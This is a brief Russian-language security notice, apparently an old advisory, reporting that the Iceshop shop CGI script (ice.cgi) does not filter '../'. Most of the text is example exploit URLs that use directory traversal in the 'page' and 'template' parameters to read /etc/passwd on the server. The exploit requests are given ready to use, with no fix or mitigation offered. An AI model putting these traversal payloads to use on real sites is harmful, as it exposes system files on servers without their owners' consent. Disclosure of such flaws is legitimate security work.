Iceshop не фильтрует «../». Из этого следует, что
злоумышленник может смотреть файлы с правами
работающего вебсервера. Сайт: http://www.iceshop.nl/

Ex. "etc/passwd" 

http://www.server.nl/takeitnow/store/ice.cgi? a_scap=1&d_prid=&d_catg=64&d_word=
&page=./Html/fp/cat_camera.html
http://www.server.nl/takeitnow/store/ice.cgi? a_scap=1&d_prid=&d_catg=64&d_word=
&page=../../../../../../../../../../../etc/passwd

или 

http://www.server2.com/ice.cgi?a_spit=1&template= pro_templ1.html&d_prid=538337 
http://www.server2.com/ice.cgi?a_spit=1&template= ../../../../../../../etc/passwd&d_prid=538337



Оставить мнение